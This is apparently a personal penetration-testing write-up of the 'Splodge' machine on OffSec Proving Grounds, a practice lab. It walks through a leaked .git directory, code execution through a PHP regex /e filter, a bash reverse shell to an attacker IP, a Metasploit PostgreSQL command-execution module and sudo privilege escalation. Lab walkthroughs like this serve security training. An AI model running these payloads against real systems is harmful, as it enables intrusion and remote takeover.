> For the complete documentation index, see [llms.txt](https://cel1s0.gitbook.io/offsec-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cel1s0.gitbook.io/offsec-notes/walkthroughs/pg-practice/linux/get-to-work/splodge.md).

# Splodge

### Enumeration

```
80/tcp   open  http       nginx 1.16.1
|_http-title: 403 Forbidden
| http-git: 
|   192.168.147.108:80/.git/
|     Git repository found!
|     .git/config matched patterns 'user'
|     .gitignore matched patterns 'bug' 'key'
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: initial commit 
|_    Project type: node.js application (guessed from .gitignore)
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.16.1
```

```
http://192.168.147.108/.git/config

	name = The Splodge
	email = admin@splodge.offsec
```

Saved and edited contents of /.git/index to index.txt

GET /§§ HTTP/1.1 Intruder, Sniper Attack - index.txt

```
/database/.gitignore

In the response:
*.db
```

Blind guess.

```
http://192.168.147.108/database/splodge.db
splodge.db: SQLite 3.x database, last written using SQLite version 3008010
```

Opened it with SQLite Database Browser

<table><thead><tr><th width="150">id</th><th width="150">title</th><th width="150">filter</th><th width="150">replacement</th><th>password</th></tr></thead><tbody><tr><td>1</td><td>Splodge </td><td>/x/e</td><td>system('id');</td><td>[REDACTED]</td></tr></tbody></table>

<table><thead><tr><th width="150">id</th><th width="150">post_id</th><th width="150">author</th><th width="353">message</th></tr></thead><tbody><tr><td>2</td><td>1</td><td>x</td><td> uid=0(root) gid=0(root) groups=0(root)</td></tr></tbody></table>

/login -> admin:\[REDACTED]

Profanity Filter Regex -> /x/e

Profanity Replacement -> system('id');

Post a comment x:x&#x20;

In the response:

x: uid=997(nginx) gid=995(nginx) groups=995(nginx)

### Initial Access

Profanity Filter Regex -> /x/e

Profanity Replacement -> system('/bin/bash -i >& /dev/tcp/192.168.49.147/80 0>&1');

Post a comment x:x

### Lateral Movement

Enviroment Variables:

```
DB_HOST=127.0.0.1                                                                   
DB_PORT=5432
APP_NAME=Splodge
USER=nginx
APP_URL=http://splodge.offsec
PATH=/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/sbin:/bin
DB_CONNECTION=pgsql
DB_DATABASE=splodge
DB_PASSWORD=[REDACTED]
DB_USERNAME=postgres
HOME=/var/lib/nginx
```

```
$ ps aux | grep pgsql
thesplo+  1023  0.0  0.9 397396 17472 ?        Ss   18:26   0:00 /usr/pgsql-12/bin/postmaster -D /home/thesplodge/.pgdata
```

```
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > options 

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name               Current Setting     Required  Description
   ----               ---------------     --------  -----------
   DATABASE           template1           yes       The database to authenticate a
                                                    gainst
   DUMP_TABLE_OUTPUT  false               no        select payload command output
                                                    from table (For Debugging)
   PASSWORD           [REDACTED]          no        The password for the specified
                                                    username. Leave blank for a random
                                                    password.
   RHOSTS             192.168.147.108     yes       The target host(s), see https:
                                                    //github.com/rapid7/metasploit
                                                    -framework/wiki/Using-Metasploit
   RPORT              5432                yes       The target port (TCP)
   TABLENAME          imqV1ya2m           yes       A table name that does not exi
                                                    st (To avoid deletion)
   USERNAME           postgres            yes       The username to authenticate as


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.49.147   yes       The listen address (an interface may be speci
                                     fied)
   LPORT  80               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
```

### PrivEsc

```
[thesplodge@splodge ~]$ sudo -l
...
User thesplodge may run the following commands on splodge:
    (ALL) NOPASSWD: /bin/bash
    
[thesplodge@splodge ~]$ sudo /bin/bash
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://cel1s0.gitbook.io/offsec-notes/walkthroughs/pg-practice/linux/get-to-work/splodge.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.